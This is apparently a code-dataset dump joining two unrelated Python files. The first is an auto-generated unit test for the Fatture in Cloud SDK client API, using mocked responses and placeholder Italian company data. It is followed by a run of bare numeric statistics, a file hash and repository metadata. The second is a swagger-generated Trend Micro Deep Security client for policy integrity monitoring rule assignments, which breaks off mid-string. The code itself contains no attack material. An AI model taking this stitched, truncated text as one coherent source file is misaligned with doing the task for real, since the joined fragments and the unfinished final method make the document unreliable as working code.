""" Fatture in Cloud API v2 - API Reference Connect your software with Fatture in Cloud, the invoicing platform chosen by more than 400.000 businesses in Italy. The Fatture in Cloud API is based on REST, and makes possible to interact with the user related data prior authorization via OAuth2 protocol. # noqa: E501 The version of the OpenAPI document: 2.0.9 Contact: info@fattureincloud.it Generated by: https://openapi-generator.tech """ import unittest import unittest.mock import functions import fattureincloud_python_sdk from fattureincloud_python_sdk.rest import RESTResponse from fattureincloud_python_sdk.api.clients_api import ClientsApi from fattureincloud_python_sdk.model.client import Client from fattureincloud_python_sdk.model.client_type import ClientType from fattureincloud_python_sdk.model.default_payment_terms_type import DefaultPaymentTermsType from fattureincloud_python_sdk.model.payment_account import PaymentAccount from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType from fattureincloud_python_sdk.model.payment_method import PaymentMethod from fattureincloud_python_sdk.model.payment_method_details import PaymentMethodDetails from fattureincloud_python_sdk.model.payment_method_type import PaymentMethodType from fattureincloud_python_sdk.model.vat_type import VatType from fattureincloud_python_sdk.model.create_client_response import CreateClientResponse from fattureincloud_python_sdk.model.get_client_response import GetClientResponse from fattureincloud_python_sdk.model.list_clients_response import ListClientsResponse from fattureincloud_python_sdk.model.modify_client_response import ModifyClientResponse class TestClientsApi(unittest.TestCase): """ClientsApi unit test stubs""" def setUp(self): self.api = ClientsApi() def tearDown(self): pass def test_create_client(self): resp = { 'status': 200, 'data': b'{"data": {"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", 
"last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.POST = unittest.mock.MagicMock(return_value = mock_resp) expected = CreateClientResponse(data = Client( id=2, code="123", name="Rossi S.r.l.", 
type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ) ) actual = self.api.create_client(2) actual.data.id = 2 assert actual == expected def test_delete_client(self): resp = { 'status': 200, 'data': b'{}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) 
self.api.api_client.rest_client.DELETE = unittest.mock.MagicMock(return_value = mock_resp) actual = self.api.delete_client(2, 12345) assert actual == None def test_get_client(self): resp = { 'status': 200, 'data': b'{"data": {"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}}', 'reason': "OK" } mock_resp = 
RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp) expected = GetClientResponse(data = Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ) ) actual 
= self.api.get_client(2, 12345) actual.data.id = 2 assert actual == expected def test_list_clients(self): resp = { 'status': 200, 'data': b'{"data": [{"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}, {"id": 2, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": 
"last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}]}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp) expected = ListClientsResponse(data = [Client( id=2, code="123", name="Rossi S.r.l.", 
type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ),Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", 
address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" )] ) actual = self.api.list_clients(2) actual.data[0].id = 2 assert actual == expected def test_modify_client(self): resp = { 'status': 200, 'data': b'{"data": {"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": 
"mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.PUT = unittest.mock.MagicMock(return_value = mock_resp) expected = ModifyClientResponse(data = Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", 
email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ) ) actual = self.api.modify_client(2, 12345) actual.data.id = 2 assert actual == expected if __name__ == '__main__': unittest.main()
171.421875
3,464
0.75016
2,882
21,942
5.377516
0.068702
0.042586
0.025745
0.024519
0.916763
0.904375
0.899471
0.8785
0.872306
0.869273
0
0.025681
0.09671
21,942
127
3,465
172.771654
0.756256
0.021101
0
0.446809
0
0.042553
0.566026
0.153921
0
0
0
0
0.053191
1
0.074468
false
0.010638
0.202128
0
0.287234
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
e82c3ba4a23af698b980feab1f912e2fb70f8906
25,880
py
Python
source/deepsecurity/api/policy_integrity_monitoring_rule_assignments__recommendations_api.py
felipecosta09/cloudone-workload-controltower-lifecycle
7927c84d164058b034fc872701b5ee117641f4d1
[ "Apache-2.0" ]
1
2021-10-30T16:40:09.000Z
2021-10-30T16:40:09.000Z
source/deepsecurity/api/policy_integrity_monitoring_rule_assignments__recommendations_api.py
felipecosta09/cloudone-workload-controltower-lifecycle
7927c84d164058b034fc872701b5ee117641f4d1
[ "Apache-2.0" ]
1
2021-07-28T20:19:03.000Z
2021-07-28T20:19:03.000Z
source/deepsecurity/api/policy_integrity_monitoring_rule_assignments__recommendations_api.py
felipecosta09/cloudone-workload-controltower-lifecycle
7927c84d164058b034fc872701b5ee117641f4d1
[ "Apache-2.0" ]
1
2021-10-30T16:40:02.000Z
2021-10-30T16:40:02.000Z
# coding: utf-8 """ Trend Micro Deep Security API Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501 OpenAPI spec version: 12.5.841 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from deepsecurity.api_client import ApiClient class PolicyIntegrityMonitoringRuleAssignmentsRecommendationsApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def add_integrity_monitoring_rule_ids_to_policy(self, policy_id, api_version, **kwargs): # noqa: E501 """Add Integrity Monitoring Rule IDs # noqa: E501 Assign integrity monitoring rule IDs to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_integrity_monitoring_rule_ids_to_policy(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to add. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_integrity_monitoring_rule_ids_to_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 else: (data) = self.add_integrity_monitoring_rule_ids_to_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 return data def add_integrity_monitoring_rule_ids_to_policy_with_http_info(self, policy_id, api_version, **kwargs): # noqa: E501 """Add Integrity Monitoring Rule IDs # noqa: E501 Assign integrity monitoring rule IDs to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_integrity_monitoring_rule_ids_to_policy_with_http_info(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to add. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" all_params = ['policy_id', 'api_version', 'integrity_monitoring_rule_ids', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_integrity_monitoring_rule_ids_to_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `add_integrity_monitoring_rule_ids_to_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `add_integrity_monitoring_rule_ids_to_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `add_integrity_monitoring_rule_ids_to_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None if 'integrity_monitoring_rule_ids' in params: body_params = params['integrity_monitoring_rule_ids'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = 
self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def list_integrity_monitoring_rule_ids_on_policy(self, policy_id, api_version, **kwargs): # noqa: E501 """List Integrity Monitoring Rule IDs # noqa: E501 Lists all integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.list_integrity_monitoring_rule_ids_on_policy(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.list_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 else: (data) = self.list_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 return data def list_integrity_monitoring_rule_ids_on_policy_with_http_info(self, policy_id, api_version, **kwargs): # noqa: E501 """List Integrity Monitoring Rule IDs # noqa: E501 Lists all integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.list_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" all_params = ['policy_id', 'api_version', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_integrity_monitoring_rule_ids_on_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `list_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `list_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `list_integrity_monitoring_rule_ids_on_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = 
['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def remove_integrity_monitoring_rule_id_from_policy(self, policy_id, integrity_monitoring_rule_id, api_version, **kwargs): # noqa: E501 """Remove an Integrity Monitoring Rule ID # noqa: E501 Unassign an integrity monitoring rule ID from a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.remove_integrity_monitoring_rule_id_from_policy(policy_id, integrity_monitoring_rule_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param int integrity_monitoring_rule_id: The ID number of the integrity monitoring rule to delete. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.remove_integrity_monitoring_rule_id_from_policy_with_http_info(policy_id, integrity_monitoring_rule_id, api_version, **kwargs) # noqa: E501 else: (data) = self.remove_integrity_monitoring_rule_id_from_policy_with_http_info(policy_id, integrity_monitoring_rule_id, api_version, **kwargs) # noqa: E501 return data def remove_integrity_monitoring_rule_id_from_policy_with_http_info(self, policy_id, integrity_monitoring_rule_id, api_version, **kwargs): # noqa: E501 """Remove an Integrity Monitoring Rule ID # noqa: E501 Unassign an integrity monitoring rule ID from a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.remove_integrity_monitoring_rule_id_from_policy_with_http_info(policy_id, integrity_monitoring_rule_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param int integrity_monitoring_rule_id: The ID number of the integrity monitoring rule to delete. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" all_params = ['policy_id', 'integrity_monitoring_rule_id', 'api_version', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method remove_integrity_monitoring_rule_id_from_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `remove_integrity_monitoring_rule_id_from_policy`") # noqa: E501 # verify the required parameter 'integrity_monitoring_rule_id' is set if ('integrity_monitoring_rule_id' not in params or params['integrity_monitoring_rule_id'] is None): raise ValueError("Missing the required parameter `integrity_monitoring_rule_id` when calling `remove_integrity_monitoring_rule_id_from_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `remove_integrity_monitoring_rule_id_from_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `remove_integrity_monitoring_rule_id_from_policy`, must conform to the pattern 